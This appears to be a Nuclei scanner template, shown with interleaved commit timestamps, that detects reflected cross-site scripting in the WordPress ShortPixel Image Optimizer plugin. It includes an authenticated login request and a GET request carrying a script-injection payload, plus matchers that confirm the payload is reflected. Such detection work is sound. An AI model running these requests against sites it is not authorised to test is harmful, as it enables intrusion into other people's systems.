2022-07-06 09:56:41 +00:00
id : shortpixel-image-optimizer-xss
info :
2022-09-08 13:28:46 +00:00
name : WordPress ShortPixel Image Optimizer <4.22.10 - Cross-Site Scripting
2022-07-06 09:56:41 +00:00
author : Akincibor
severity : medium
2022-09-08 13:28:46 +00:00
description : WordPress ShortPixel Image Optimizer 4.22.10 does not escape generated URLs before outputting them back in an attribute, leading to reflected cross-site scripting.
2022-07-06 09:56:41 +00:00
reference :
- https://wpscan.com/vulnerability/8a0ddd14-7260-4fb6-bb87-2916aa41ff01
- https://wordpress.org/plugins/shortpixel-image-optimiser
2022-07-06 10:07:10 +00:00
metadata :
verified : true
2022-09-08 13:28:46 +00:00
classification :
2023-03-03 15:27:54 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score : 5.4
cwe-id : CWE-80
2022-08-27 04:41:18 +00:00
tags : shortpixel,authenticated,wpscan,xss,wp-plugin,wp,wordpress
2022-07-06 09:56:41 +00:00
requests :
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Origin : {{RootURL}}
Content-Type : application/x-www-form-urlencoded
Cookie : wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/options-general.php?page=wp-shortpixel-settings&"><script>alert(1)</script> HTTP/1.1
Host : {{Hostname}}
cookie-reuse : true
matchers-condition : and
matchers :
- type : word
part : body
words :
- '&\"><script>alert(1)</script>&noheader=true&sp-action'
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2022-09-08 13:28:46 +00:00
# Enhanced by mp on 2022/09/07